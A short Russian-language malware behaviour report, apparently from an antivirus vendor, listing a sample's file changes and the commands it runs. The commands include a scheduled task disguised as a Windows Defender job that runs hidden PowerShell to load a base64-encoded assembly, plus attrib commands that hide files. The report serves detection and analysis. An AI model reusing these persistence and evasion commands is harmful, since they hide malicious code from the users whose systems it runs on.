Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\windowsdefendertasksgmz
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tmp2461.tmp.bat
Удаляет следующие файлы
- %TEMP%\tmp2461.tmp.bat
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp2461.tmp.bat" "' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 5 /tn "WindowsDefenderTasksgmz" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64Strin...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tmp2461.tmp.bat" "
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgmz
- '<SYSTEM32>\attrib.exe' +s +a +h %APPDATA%\sgmz\*
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 5 /tn "WindowsDefenderTasksgmz" /tr "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [Reflection.Assembly]::Load([System.Convert]::Frombase64Strin...
